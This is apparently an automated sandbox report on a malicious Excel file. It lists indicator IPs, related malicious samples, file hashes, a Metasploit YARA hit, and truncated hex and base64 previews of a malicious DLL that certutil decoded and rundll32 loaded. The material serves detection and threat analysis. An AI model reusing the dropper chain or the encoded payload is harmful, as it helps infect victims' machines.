                                                                                                                                                                                                          Document_7647.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          Document_7647.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          Document_7647.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215

                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19agenciatributaria5668.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          • 74.6.143.26
                                                                                                                                                                                                          SecuriteInfo.com.Generic.mg.5064de995195186f.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          • 74.6.143.26
                                                                                                                                                                                                          _#Ud83d#Udcde_frances@viaseating.com.htmGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          • 74.6.143.26
                                                                                                                                                                                                          rec6424.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          • 74.6.143.26
                                                                                                                                                                                                          Receipt.3656.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          • 74.6.143.26
                                                                                                                                                                                                          INV 5593.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          • 74.6.143.26
                                                                                                                                                                                                          IRS_Covid-19_Relief_Payment_Notice_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          • 74.6.143.26
                                                                                                                                                                                                          Qt_1186.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          • 74.6.143.26
                                                                                                                                                                                                          INV-4215.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          • 74.6.143.26
                                                                                                                                                                                                          wp-cryn.dllGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          • 74.6.143.26
                                                                                                                                                                                                          P8ob8zaRpi.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          • 74.6.143.26
                                                                                                                                                                                                          Jcantele.HTMGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          • 74.6.143.26
                                                                                                                                                                                                          Payment Confirmation Paper - Customer Copy_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          • 74.6.143.26
                                                                                                                                                                                                          1_cr.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          • 74.6.143.26
                                                                                                                                                                                                          Symptomaticshon5.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          • 74.6.143.26
                                                                                                                                                                                                          1_cr.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          • 74.6.143.26
                                                                                                                                                                                                          PO-00172020.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          • 74.6.143.26
                                                                                                                                                                                                          atikmdag-patcher 1.4.7.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          • 74.6.143.26
                                                                                                                                                                                                          Dboom.HTMGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          • 74.6.143.26
                                                                                                                                                                                                          vS8yVO8py0.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 87.248.100.215
                                                                                                                                                                                                          • 74.6.143.26

                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                          No context

                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                          C:\ProgramData\ioq\ioq.dll
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):428729
                                                                                                                                                                                                          Entropy (8bit):5.64278649126616
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:s4iOhPcWRSMyXFkdQa4dJiAJW28pj/feyj4NI:l4JiAh8pDmw4NI
                                                                                                                                                                                                          MD5:E469B3F4560C2C5BABCC295074BBC105
                                                                                                                                                                                                          SHA1:941D12A80A62835D3FFF589030E467527E3BC6AA
                                                                                                                                                                                                          SHA-256:23AA1F38F37A85AFDD5B39635E250AC90D194C9F07D93189F45DE72D99FA2580
                                                                                                                                                                                                          SHA-512:DE95815D4B02682731A22A017BA0058FD8662563E728ABABCA2258616854CAD02F6DA39BD628A1C70100A853EC68442795B0CBC966C7392DF68866EC51695DB2
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview: <!DOCTYPE html>.<html id="atomic" lang="en-US" class="atomic ua-ie ua-win ua-10.0 ua-ie7 l-out Pos-r https fp fp-default mini-uh-on uh-topbar-on ltr desktop Desktop bktFPTRELUG105">.<head>. <meta http-equiv="X-UA-Compatible" content="IE=edge">. . <title>Yahoo</title><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="//s.yimg.com"><link rel="preconnect" href="//s.yimg.com"><link rel="dns-prefetch" href="//search.yahoo.com"><link rel="preconnect" href="//search.yahoo.com"><link rel="dns-prefetch" href="//csc.beap.bc.yahoo.com"><link rel="preconnect" href="//csc.beap.bc.yahoo.com"><link rel="dns-prefetch" href="//geo.yahoo.com"><link rel="preconnect" href="//geo.yahoo.com"><link rel="dns-prefetch" href="//video-api.yql.yahoo.com"><link rel="preconnect" href="//video-api.yql.yahoo.com"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="the
                                                                                                                                                                                                          C:\Users\Public\94101.png
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\certutil.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):39256
                                                                                                                                                                                                          Entropy (8bit):6.299826299621766
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:OkrdE+NfoHHH0CZK0HOgGaFZqA6duOtT+/HHHPbMXJVs4RtmfZIO8ZpHSGAp9E+P:OkdE+tCU+OJAIddIbgVfRu1iRGp9E+hd
                                                                                                                                                                                                          MD5:E8B9879960665B995536C2EA54781ED8
                                                                                                                                                                                                          SHA1:D47FB2F7545CA519E1B22CD8AD28C5820F80F42E
                                                                                                                                                                                                          SHA-256:E3E2C9CF1CD955DB5DF06E78956B437006A11BE15059D6A5922DF5B7107F00EE
                                                                                                                                                                                                          SHA-512:E865C973CDD99DD221A86FB14E78F9423F3A2FDC0C6B73C5FE24FE6FEC13AC7165AE02441CA1D28ABDCDB55511861A55E3D5F55234E746CDB3962C2240E1E24E
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 36%
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`...........!...2.B...@...............`......................................oG.........................................d.......................X.......$.......................................................d............................text....A.......B.................. ..`.rdata...4...`...6...F..............@..@.data...@............|..............@....reloc..$...........................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\Public\94101.png2
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\certutil.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):78512
                                                                                                                                                                                                          Entropy (8bit):3.620703469882372
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:LI4jmeTNzBxB8qJVG+uEsz9m5hvIrPBxBWtA5huRMu/Z62iZVTlpq:8qTbK+u1z9m5h9OQ62sVBpq
                                                                                                                                                                                                          MD5:DDFD1FC00F13533F0955347A8F72CE8B
                                                                                                                                                                                                          SHA1:90EFAB08F39ED2271290DB9A23DF2B5C8B7BB912
                                                                                                                                                                                                          SHA-256:A6B3EAB77666F4B07617F39882E2BAAC73BF2133611D9D96D1D45E28F298D57A
                                                                                                                                                                                                          SHA-512:EABE853814794F1609A51DE756BFB1F161CD8577BE200901D48FB8C9029216B68F2D924F96366EA496F234C0FE7AD49B88BAD72672888BE656A78406DB00DFCD
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                          • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: C:\Users\Public\94101.png2, Author: Florian Roth
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview: 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c0104001f1207600000000000000000e0000e210b0102320042000000400000000000000010000000100000006000000000001000100000000200000400000000000000040000000000000000c00000000400006f470100020000000000100000100000000010000010000000000000100000000000000000000000e0a000006400000000000000000000000000000000000000008400005815000000b0000024030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a8a10000640000000000000000000000000000000000000000000000000000002e7465787400000006410000001000000042000000040000000000000000000000000000200000602e7264617461000004340000006000000036000000460000000000000000000000000000400000402e646174610000004004000000a0000000040000007c0000000000000000000000000000400000c02e72656c
                                                                                                                                                                                                          C:\Users\Public\94101.txt
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):104692
                                                                                                                                                                                                          Entropy (8bit):4.688538408578286
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:bWCif3z4LzY4wPLydHLw4Qt1DU1t+X2Rzm:b/if3IgzydHLw4j1Pzm
                                                                                                                                                                                                          MD5:F5C5C04A0FE77F5961DE1436BE716180
                                                                                                                                                                                                          SHA1:4C0ED3D03181CDE19A1DFD7D577E776CC5A4DE4E
                                                                                                                                                                                                          SHA-256:18F5D2868DAA0CB4FE4CE7038330594AA9EB82CED3E50A07718218ADEA7449D4
                                                                                                                                                                                                          SHA-512:3E4E677523D1FDB1714D26284021F9DA0FC4791B7F1F8D2721DE956434F9DD8A4909B1DF533134C6620A70728025F34ABDEFE2603400E8417C7C13B210554E21
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview: NGQ1YTkwMDAwMzAwMDAwMDA0MDAwMDAwZmZmZjAwMDBiODAwMDAwMDAwMDAwMDAwNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwODAwMDAwMDAwZTFmYmEwZTAwYjQwOWNkMjFiODAxNGNjZDIxNTQ2ODY5NzMyMDcwNzI2ZjY3NzI2MTZkMjA2MzYxNmU2ZTZmNzQyMDYyNjUyMDcyNzU2ZTIwNjk2ZTIwNDQ0ZjUzMjA2ZDZmNjQ2NTJlMGQwZDBhMjQwMDAwMDAwMDAwMDAwMDUwNDUwMDAwNGMwMTA0MDAxZjEyMDc2MDAwMDAwMDAwMDAwMDAwMDBlMDAwMGUyMTBiMDEwMjMyMDA0MjAwMDAwMDQwMDAwMDAwMDAwMDAwMDAxMDAwMDAwMDEwMDAwMDAwNjAwMDAwMDAwMDAwMTAwMDEwMDAwMDAwMDIwMDAwMDQwMDAwMDAwMDAwMDAwMDA0MDAwMDAwMDAwMDAwMDAwMGMwMDAwMDAwMDQwMDAwNmY0NzAxMDAwMjAwMDAwMDAwMDAxMDAwMDAxMDAwMDAwMDAwMTAwMDAwMTAwMDAwMDAwMDAwMDAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDBlMGEwMDAwMDY0MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDg0MDAwMDU4MTUwMDAwMDBiMDAwMDAyNDAzMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMGE4YTEwMDAwNjQwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
                                                                                                                                                                                                          C:\Users\Public\94101.xls
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):104692
                                                                                                                                                                                                          Entropy (8bit):4.688538408578286
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:bWCif3z4LzY4wPLydHLw4Qt1DU1t+X2Rzm:b/if3IgzydHLw4j1Pzm
                                                                                                                                                                                                          MD5:F5C5C04A0FE77F5961DE1436BE716180
                                                                                                                                                                                                          SHA1:4C0ED3D03181CDE19A1DFD7D577E776CC5A4DE4E
                                                                                                                                                                                                          SHA-256:18F5D2868DAA0CB4FE4CE7038330594AA9EB82CED3E50A07718218ADEA7449D4
                                                                                                                                                                                                          SHA-512:3E4E677523D1FDB1714D26284021F9DA0FC4791B7F1F8D2721DE956434F9DD8A4909B1DF533134C6620A70728025F34ABDEFE2603400E8417C7C13B210554E21
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview: NGQ1YTkwMDAwMzAwMDAwMDA0MDAwMDAwZmZmZjAwMDBiODAwMDAwMDAwMDAwMDAwNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwODAwMDAwMDAwZTFmYmEwZTAwYjQwOWNkMjFiODAxNGNjZDIxNTQ2ODY5NzMyMDcwNzI2ZjY3NzI2MTZkMjA2MzYxNmU2ZTZmNzQyMDYyNjUyMDcyNzU2ZTIwNjk2ZTIwNDQ0ZjUzMjA2ZDZmNjQ2NTJlMGQwZDBhMjQwMDAwMDAwMDAwMDAwMDUwNDUwMDAwNGMwMTA0MDAxZjEyMDc2MDAwMDAwMDAwMDAwMDAwMDBlMDAwMGUyMTBiMDEwMjMyMDA0MjAwMDAwMDQwMDAwMDAwMDAwMDAwMDAxMDAwMDAwMDEwMDAwMDAwNjAwMDAwMDAwMDAwMTAwMDEwMDAwMDAwMDIwMDAwMDQwMDAwMDAwMDAwMDAwMDA0MDAwMDAwMDAwMDAwMDAwMGMwMDAwMDAwMDQwMDAwNmY0NzAxMDAwMjAwMDAwMDAwMDAxMDAwMDAxMDAwMDAwMDAwMTAwMDAwMTAwMDAwMDAwMDAwMDAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDBlMGEwMDAwMDY0MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDg0MDAwMDU4MTUwMDAwMDBiMDAwMDAyNDAzMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMGE4YTEwMDAwNjQwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\14A1215A-380B-45DE-AA00-CCD0BB357790
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):132942
                                                                                                                                                                                                          Entropy (8bit):5.372907002637865
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:0cQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:KrQ9DQW+zBX8P
                                                                                                                                                                                                          MD5:601C9A16FE13D2F2D096938345DB8540
                                                                                                                                                                                                          SHA1:11FDAAA63703A3E80480791729D1DF5F90A00A38
                                                                                                                                                                                                          SHA-256:012DE51939AA229CFF708A373DE49A6985400142EDE518618AD506679B4D35B2
                                                                                                                                                                                                          SHA-512:B3E12A48236E8B35B960E28F939C53350CD8723B6595DD08BFFE990B3143229736B2B755E343796347704151EB1E26553ECA302F590562A9BEABCA133B7B91D7
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-01-20T13:02:50">.. Build: 16.0.13718.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\C4803565.png
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:PNG image data, 847 x 510, 8-bit colormap, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):68160
                                                                                                                                                                                                          Entropy (8bit):7.986158472858729
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:j7xVUSqNWeAGoFARdxULAZAiamMA5uAUNyAzm83xQGaM0sP:/sUtFARPULAZemMA5uAgz3xQGaI
                                                                                                                                                                                                          MD5:0C491404AFF12DE1662733C17C9E9ADB
                                                                                                                                                                                                          SHA1:309DAAD58B5F00B063372165DE838E9B60FEE879
                                                                                                                                                                                                          SHA-256:86A81B1E4A8CC589CA3D7E855BF5E80486C4C33D8633A8D9488AF8D98919F5DA
                                                                                                                                                                                                          SHA-512:CE9DA288411F6EC8124397A7E3DA7BE53A98C338E4E34B3AA0B7C78D20F3297F72755F520308C324CED1C560173D43966B569D25F57DFC67A3A898997FDE8A01
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                                          Preview: .PNG........IHDR...O.........s.......gAMA......a.....sRGB........nPLTE............................................................................................................................................................................................//....654...''&<<:......AA=.........NNM]]]!!.DCC......GGFWWVQQQppp......www...ddc.....JJIjji......~~}...10.HF>>=-...XVB........LK3...caJ{{_..........u..............e.`B....tRNS....@@.....7.....ZIDATx....8...b..o..<.7..:H.h7.F...ec.6!........}&..\..Q...rqT.)....o$........H..G..O$..D".O$..D"..'..x"..'..D<.H...D<.H...D".H$.D".H$..D".O$..D".O$..x"..'..x".H...D<.H...D<.H$.D".H$.D".O$...+..'IY>]K.4y.'.O..H@:M...5L~~.t...4..O....'..?2L...Q..Ct........|..GvZ...s....x...2.P.BJ......u..$.i....,+....Bp.......My.gY.e.t....tY..8....u........l.2)0.E.O..R.ta.]f.,..u..y..p..U.!r"..].i....5,../..1...D....f:..,y\Sv...-.....<s...yN.B<}.+.h>.%....N...:.4/...&..e.&.R.1....E!s..I]..NdY............/a..+v..u..N|.
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\9J0CLPJO.htm
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):428729
                                                                                                                                                                                                          Entropy (8bit):5.64278649126616
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:s4iOhPcWRSMyXFkdQa4dJiAJW28pj/feyj4NI:l4JiAh8pDmw4NI
                                                                                                                                                                                                          MD5:E469B3F4560C2C5BABCC295074BBC105
                                                                                                                                                                                                          SHA1:941D12A80A62835D3FFF589030E467527E3BC6AA
                                                                                                                                                                                                          SHA-256:23AA1F38F37A85AFDD5B39635E250AC90D194C9F07D93189F45DE72D99FA2580
                                                                                                                                                                                                          SHA-512:DE95815D4B02682731A22A017BA0058FD8662563E728ABABCA2258616854CAD02F6DA39BD628A1C70100A853EC68442795B0CBC966C7392DF68866EC51695DB2
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview: <!DOCTYPE html>.<html id="atomic" lang="en-US" class="atomic ua-ie ua-win ua-10.0 ua-ie7 l-out Pos-r https fp fp-default mini-uh-on uh-topbar-on ltr desktop Desktop bktFPTRELUG105">.<head>. <meta http-equiv="X-UA-Compatible" content="IE=edge">. . <title>Yahoo</title><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="//s.yimg.com"><link rel="preconnect" href="//s.yimg.com"><link rel="dns-prefetch" href="//search.yahoo.com"><link rel="preconnect" href="//search.yahoo.com"><link rel="dns-prefetch" href="//csc.beap.bc.yahoo.com"><link rel="preconnect" href="//csc.beap.bc.yahoo.com"><link rel="dns-prefetch" href="//geo.yahoo.com"><link rel="preconnect" href="//geo.yahoo.com"><link rel="dns-prefetch" href="//video-api.yql.yahoo.com"><link rel="preconnect" href="//video-api.yql.yahoo.com"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="the
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\A7810000
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):115300
                                                                                                                                                                                                          Entropy (8bit):7.940160209054297
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3072:WktzG/asUtFARPULAZemMA5uAgz3xQGan:WCG/SFAeErgzBQGU
                                                                                                                                                                                                          MD5:648087C71BCC1624A0D679BD5658E2CA
                                                                                                                                                                                                          SHA1:2283CDB627CDC8C4D874BAD8766CF6F1EA6B0EEC
                                                                                                                                                                                                          SHA-256:1DC278312F72E0059624451612D8973A07CBC5D8D6C73E151ACD027723721E01
                                                                                                                                                                                                          SHA-512:05061348772DD12747D02E991C036FD37BDEE1ACDCAC6345114B8BDC5F54732DFAD0BDADE457162AAA2463DF8EBB17F29B31CF8F632AE6479C32FE6C3FFFE09D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview: .U.N.1..W.;.|.v.(.*...J.-R....$....1..=c'..B.(..e....3.._,...1R.]+N....).{7k....wQQ...x..X"....O.e@....]J.\JR.Z...t.3..B..8....f(OG.oRy..:e.1...).T]-xy.$....W.T+z..y]nED4...!.^A..{._....F.3......7...KO........X]CL...s.0.......f7Ivi..B.P....*.+...y.z..p.RA.,..;$_....i.P{ug9L......5M.I........A|..'.%..M.MN.C..?q)@Y..g`.....4HG~...r......h...s...:.C. ...}M4..\.H.<......}.F]v\.......}.......q..O=(...D.S......o....|c.-W..-K..<.......PK..........!.l.......#.......[Content_Types].xml ...(..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\94101.txt.LNK
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Jan 20 21:02:52 2021, mtime=Wed Jan 20 21:02:52 2021, atime=Wed Jan 20 21:02:52 2021, length=104692, window=hide
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1882
                                                                                                                                                                                                          Entropy (8bit):4.63489934711943
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:8h3wVmzCASBvbEsWo7aB6myh3wVmzCASBvbEsWo7aB6m:8RwwVSNPoB6pRwwVSNPoB6
                                                                                                                                                                                                          MD5:BCEC82D990F66DC16794B980A15C00FE
                                                                                                                                                                                                          SHA1:376AD7ED7F08BE04DF9851BD6DC526180EFB4B74
                                                                                                                                                                                                          SHA-256:D02001F122F8DFE42D07E0EFEC5112D4D0DB432CF033EBE7220B8E0A43B5A461
                                                                                                                                                                                                          SHA-512:C123281ED772AF3664087EED53876872D84D7ED94F98CC1FAAD0237AF8A4688176B3EDC4FC9AD4591A2C34B29A21901DF71A8CAFD123BF8BEFC74CCF838D1B00
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview: L..................F.... ....;..w.......w.......w................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..4RN.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1.....4R[...Public..f......L.4R[.....................<.........P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....\.2.....4R[. .94101.txt.D......4R[.4R[......g....................A...9.4.1.0.1...t.x.t.......H...............-.......G...........>.S......C:\Users\Public\94101.txt..".....\.....\.....\.....\.....\.....\.P.u.b.l.i.c.\.9.4.1.0.1...t.x.t..........v..*.cM.jVD.Es.!...`.......X.......210979...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............L..................F.... ....;..w.......w.......w..........
                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\94101.xls.LNK
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Jan 20 21:02:52 2021, mtime=Wed Jan 20 21:02:52 2021, atime=Wed Jan 20 21:02:52 2021, length=104692, window=hide
                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                          Size (bytes):1882
                                                                                                                                                                                                          Entropy (8bit):4.623141859867614
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:8hwRTmzAASbvbM+7aB6myhwRTmzAASbvbM+7aB6m:8hwATS3M3B6phwATS3M3B6
                                                                                                                                                                                                          MD5:0313B142356DAFE7672F359BBF9208C0
                                                                                                                                                                                                          SHA1:A25FE0B1E18C1C42ECF68C2D97154AB0E09E2E1E
                                                                                                                                                                                                          SHA-256:F5FD5B3DD39A0C6678FF653DF4498AB361B348BDD9CA327ED6C7267DB79D82E8
                                                                                                                                                                                                          SHA-512:B1BA6FFA6619A49CE95F184D716B85D41D1B994DCEF1B32F5699A8E58FB692C506ACCD0E975C6D3FC79772ED1ABC1CFBF6F9CA3C5D6618DFD9DFE24B5A1858E5
                                                                                                                                                                                                          Malicious:false
